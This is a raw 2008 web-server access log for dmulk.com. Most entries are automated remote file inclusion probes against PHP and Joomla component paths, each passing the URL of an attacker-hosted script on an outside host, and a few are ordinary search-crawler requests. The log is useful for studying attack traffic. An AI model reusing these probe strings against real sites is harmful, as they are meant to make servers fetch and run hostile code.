70.86.29.178 - - [06/Jul/2008:09:23:38 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:09:23:38 -0700] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
78.24.133.93 - - [06/Jul/2008:09:24:01 -0700] "GET /logs/access_080225.log/index2.php?x=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.24.133.93 - - [06/Jul/2008:09:24:02 -0700] "GET /logs/index2.php?x=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.105.117 - - [06/Jul/2008:09:24:09 -0700] "GET /reports.php?sub=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [06/Jul/2008:09:24:09 -0700] "GET /logs/reports.php?sub=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [06/Jul/2008:09:24:09 -0700] "GET /logs/access_080218.log/reports.php?sub=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:09:24:17 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:09:24:17 -0700] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
222.251.223.180 - - [06/Jul/2008:09:24:22 -0700] "GET /logs/access_080220.log/index1.php?x=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.135.183.134 - - [06/Jul/2008:09:24:32 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.135.183.134 - - [06/Jul/2008:09:24:33 -0700] "GET /errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
91.121.137.51 - - [06/Jul/2008:09:24:43 -0700] "GET /logs/access_080315.log/index1.php?menu=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.234.200.150 - - [06/Jul/2008:09:24:52 -0700] "GET /logs/access_080228.log//modules/vwar/admin/admin.php?vwar_root=http://tugaspeed.info/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.171.122 - - [06/Jul/2008:09:24:59 -0700] "GET /logs/access_080329.log/main.php?sayfa=http://the-secretagent.cc/r00t/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.84.171.122 - - [06/Jul/2008:09:24:59 -0700] "GET /main.php?sayfa=http://the-secretagent.cc/r00t/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.7.197.76 - - [06/Jul/2008:09:25:02 -0700] "GET /logs/access_080316.log/includes/db_connect.php?baseDir=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.121.137.51 - - [06/Jul/2008:09:25:05 -0700] "GET /logs/access_080207.log/index1.php?menu=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.251.223.180 - - [06/Jul/2008:09:25:07 -0700] "GET /index1.php?site=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.130.225 - - [06/Jul/2008:09:25:11 -0700] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.96.238.2 - - [06/Jul/2008:09:25:22 -0700] "GET /logs/access_080329.log/main.php?sayfa=http://the-secretagent.cc/r00t/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
195.96.238.2 - - [06/Jul/2008:09:25:23 -0700] "GET /main.php?sayfa=http://the-secretagent.cc/r00t/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
65.55.211.20 - - [06/Jul/2008:09:25:37 -0700] "GET /bikes/dteel/2008-05-30/?D=D HTTP/1.1" 200 6027 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
67.195.37.125 - - [06/Jul/2008:09:25:37 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
77.232.68.17 - - [06/Jul/2008:09:25:38 -0700] "GET /logs/access.log//index.php?lang=en&page=http://pemlk.iespana.es/tools/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.37.125 - - [06/Jul/2008:09:25:40 -0700] "GET /?show=gallery&pageid=159 HTTP/1.0" 200 54281 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
70.84.171.122 - - [06/Jul/2008:09:25:40 -0700] "GET /logs/access_080225.log/main.php?sayfa=http://the-secretagent.cc/r00t/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.195.37.125 - - [06/Jul/2008:09:25:40 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.0" 200 9232 "http://dmulk.com/?show=gallery&pageid=159" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.37.125 - - [06/Jul/2008:09:25:41 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.0" 200 5241 "http://dmulk.com/?show=gallery&pageid=159" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.37.125 - - [06/Jul/2008:09:25:41 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.0" 200 4019 "http://dmulk.com/?show=gallery&pageid=159" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
85.114.130.225 - - [06/Jul/2008:09:25:44 -0700] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.171.122 - - [06/Jul/2008:09:25:50 -0700] "GET /logs/access_080329.log/main.php?sayfa=http://the-secretagent.cc/r00t/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.171.122 - - [06/Jul/2008:09:25:50 -0700] "GET /main.php?sayfa=http://the-secretagent.cc/r00t/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.171.122 - - [06/Jul/2008:09:25:50 -0700] "GET /logs/main.php?sayfa=http://the-secretagent.cc/r00t/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.171.122 - - [06/Jul/2008:09:25:53 -0700] "GET /main.php?sayfa=http://the-secretagent.cc/r00t/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.198.175.18 - - [06/Jul/2008:09:25:54 -0700] "GET /logs/access_080118.log/index.php?url=http://www.vanderjagt-kraanverhuur.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.198.175.18 - - [06/Jul/2008:09:25:56 -0700] "GET /index.php?url=http://www.vanderjagt-kraanverhuur.nl/id.txt? HTTP/1.1" 200 18403 "-" "libwww-perl/5.808" "www.dmulk.com"
69.94.56.40 - - [06/Jul/2008:09:25:57 -0700] "GET /logs/access_080330.log//main.php?appserv_root=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.40 - - [06/Jul/2008:09:25:57 -0700] "GET //main.php?appserv_root=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.40 - - [06/Jul/2008:09:25:57 -0700] "GET /logs//main.php?appserv_root=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
195.96.238.2 - - [06/Jul/2008:09:25:57 -0700] "GET /main.php?sayfa=http://the-secretagent.cc/r00t/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.198.175.18 - - [06/Jul/2008:09:25:58 -0700] "GET /logs/index.php?url=http://www.vanderjagt-kraanverhuur.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.198.175.18 - - [06/Jul/2008:09:25:59 -0700] "GET /logs/access_080118.log/index.php?url=http://www.oryapiinsaat.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.198.175.18 - - [06/Jul/2008:09:26:02 -0700] "GET /index.php?url=http://www.oryapiinsaat.com/echo.txt? HTTP/1.1" 200 18387 "-" "libwww-perl/5.808" "www.dmulk.com"
91.198.175.18 - - [06/Jul/2008:09:26:04 -0700] "GET /logs/index.php?url=http://www.oryapiinsaat.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.238.195.13 - - [06/Jul/2008:09:26:04 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.homeimmobiliare.eu/images/banners/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.124.198.62 - - [06/Jul/2008:09:26:15 -0700] "GET /logs/access_080330.log//main.php?appserv_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.124.198.62 - - [06/Jul/2008:09:26:15 -0700] "GET //main.php?appserv_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.124.198.62 - - [06/Jul/2008:09:26:15 -0700] "GET /logs//main.php?appserv_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.85.48.194 - - [06/Jul/2008:09:26:21 -0700] "GET /errors.php?error=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
70.85.48.194 - - [06/Jul/2008:09:26:21 -0700] "GET /logs/errors.php?error=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
202.4.48.210 - - [06/Jul/2008:09:26:22 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://x-femdom.net/st/img/icons/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
202.4.48.210 - - [06/Jul/2008:09:26:23 -0700] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://x-femdom.net/st/img/icons/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
200.219.232.65 - - [06/Jul/2008:09:26:23 -0700] "GET /logs/access_080507.log/home.php?x=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.219.232.65 - - [06/Jul/2008:09:26:24 -0700] "GET /home.php?x=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.96.238.2 - - [06/Jul/2008:09:26:24 -0700] "GET /logs/access_080329.log/main.php?sayfa=http://the-secretagent.cc/r00t/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.219.232.65 - - [06/Jul/2008:09:26:24 -0700] "GET /logs/home.php?x=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.96.238.2 - - [06/Jul/2008:09:26:24 -0700] "GET /main.php?sayfa=http://the-secretagent.cc/r00t/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.96.238.2 - - [06/Jul/2008:09:26:25 -0700] "GET /logs/main.php?sayfa=http://the-secretagent.cc/r00t/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.96.238.2 - - [06/Jul/2008:09:26:29 -0700] "GET /logs/access_080225.log/main.php?sayfa=http://the-secretagent.cc/r00t/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.84.171.122 - - [06/Jul/2008:09:26:35 -0700] "GET /logs/access_080225.log/main.php?sayfa=http://the-secretagent.cc/r00t/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.24.133.93 - - [06/Jul/2008:09:26:53 -0700] "GET /main.php?x=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.96.238.2 - - [06/Jul/2008:09:26:59 -0700] "GET /logs/access_080225.log/main.php?sayfa=http://the-secretagent.cc/r00t/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:09:27:07 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:09:27:07 -0700] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:09:27:14 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:09:27:14 -0700] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:09:27:22 -0700] "GET /logs/access_071219.log//components/errors.php?error=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:09:27:24 -0700] "GET /logs/access_071219.log/:/components/errors.php?error=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.197.76 - - [06/Jul/2008:09:27:34 -0700] "GET /logs/access_080316.log/includes/db_connect.php?baseDir=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.24.133.93 - - [06/Jul/2008:09:27:36 -0700] "GET /logs/access.log/index2.php?x=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.4.48.210 - - [06/Jul/2008:09:27:40 -0700] "GET /logs//index.php?option=com_dfcontact&view=archive&mosConfig_absolute_path=http://x-femdom.net/st/img/icons/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
202.4.48.210 - - [06/Jul/2008:09:27:41 -0700] "GET //index.php?option=com_dfcontact&view=archive&mosConfig_absolute_path=http://x-femdom.net/st/img/icons/test.txt?? HTTP/1.1" 200 18541 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
209.250.234.226 - - [06/Jul/2008:09:27:43 -0700] "GET /logs/access_080330.log//main.php?appserv_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.250.234.226 - - [06/Jul/2008:09:27:44 -0700] "GET //main.php?appserv_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.250.234.226 - - [06/Jul/2008:09:27:44 -0700] "GET /logs//main.php?appserv_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.72.56.36 - - [06/Jul/2008:09:27:49 -0700] "GET /logs/access_080330.log//main.php?appserv_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.72.56.36 - - [06/Jul/2008:09:27:50 -0700] "GET //main.php?appserv_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.72.56.36 - - [06/Jul/2008:09:27:50 -0700] "GET /logs//main.php?appserv_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.96.238.2 - - [06/Jul/2008:09:27:51 -0700] "GET /logs/main.php?sayfa=http://the-secretagent.cc/r00t/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.96.238.2 - - [06/Jul/2008:09:27:51 -0700] "GET /main.php?sayfa=http://the-secretagent.cc/r00t/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.234.57 - - [06/Jul/2008:09:27:53 -0700] "GET /logs/access_080330.log//main.php?appserv_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.234.57 - - [06/Jul/2008:09:27:53 -0700] "GET //main.php?appserv_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.234.57 - - [06/Jul/2008:09:27:53 -0700] "GET /logs//main.php?appserv_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.96.238.2 - - [06/Jul/2008:09:28:10 -0700] "GET /logs/main.php?sayfa=http://the-secretagent.cc/r00t/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.96.238.2 - - [06/Jul/2008:09:28:10 -0700] "GET /main.php?sayfa=http://the-secretagent.cc/r00t/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:09:28:14 -0700] "GET /logs/access_080330.log//main.php?appserv_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:09:28:15 -0700] "GET //main.php?appserv_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:09:28:15 -0700] "GET /logs//main.php?appserv_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.106.98.71 - - [06/Jul/2008:09:28:19 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [06/Jul/2008:09:28:19 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.96.78.30 - - [06/Jul/2008:09:28:43 -0700] "GET /logs/db.php?path_local=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
84.96.78.30 - - [06/Jul/2008:09:28:44 -0700] "GET /logs/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
84.96.78.30 - - [06/Jul/2008:09:28:44 -0700] "GET /db.php?path_local=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
84.96.78.30 - - [06/Jul/2008:09:28:45 -0700] "GET /errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:09:28:48 -0700] "GET /logs//main.php?appserv_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:09:28:48 -0700] "GET //main.php?appserv_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:09:29:10 -0700] "GET /logs//index.php?option=com_dfcontact&view=archive&mosConfig_absolute_path=http://www.geocities.com/luthercorp1/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:09:29:10 -0700] "GET /logs//index.php?option=com_dfcontact&view=archive&mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:09:29:11 -0700] "GET //index.php?option=com_dfcontact&view=archive&mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 200 18511 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:09:29:12 -0700] "GET /logs/access_080315.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://datteln-online.com/event/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:09:29:12 -0700] "GET //index.php?option=com_dfcontact&view=archive&mosConfig_absolute_path=http://www.geocities.com/luthercorp1/kngid.txt? HTTP/1.1" 200 18521 "-" "libwww-perl/5.810" "www.dmulk.com"
89.188.110.128 - - [06/Jul/2008:09:29:16 -0700] "GET //components/errors.php?error=http://lipno.org/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.234.57 - - [06/Jul/2008:09:29:23 -0700] "GET /logs/access_080129.log//main.php?appserv_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.234.57 - - [06/Jul/2008:09:29:24 -0700] "GET //main.php?appserv_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.234.57 - - [06/Jul/2008:09:29:24 -0700] "GET /logs//main.php?appserv_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.250.234.226 - - [06/Jul/2008:09:29:30 -0700] "GET /logs/access_080129.log//main.php?appserv_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.250.234.226 - - [06/Jul/2008:09:29:30 -0700] "GET //main.php?appserv_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.250.234.226 - - [06/Jul/2008:09:29:31 -0700] "GET /logs//main.php?appserv_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.69.204.75 - - [06/Jul/2008:09:29:32 -0700] "GET /logs/access_080313.log//components/com_forum/download.php?phpbb_root_path=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
212.69.204.75 - - [06/Jul/2008:09:29:32 -0700] "GET //components/com_forum/download.php?phpbb_root_path=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
212.69.204.75 - - [06/Jul/2008:09:29:33 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:09:29:59 -0700] "GET /logs/access_080330.log//main.php?appserv_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:09:29:59 -0700] "GET //main.php?appserv_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:09:30:00 -0700] "GET /logs//main.php?appserv_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
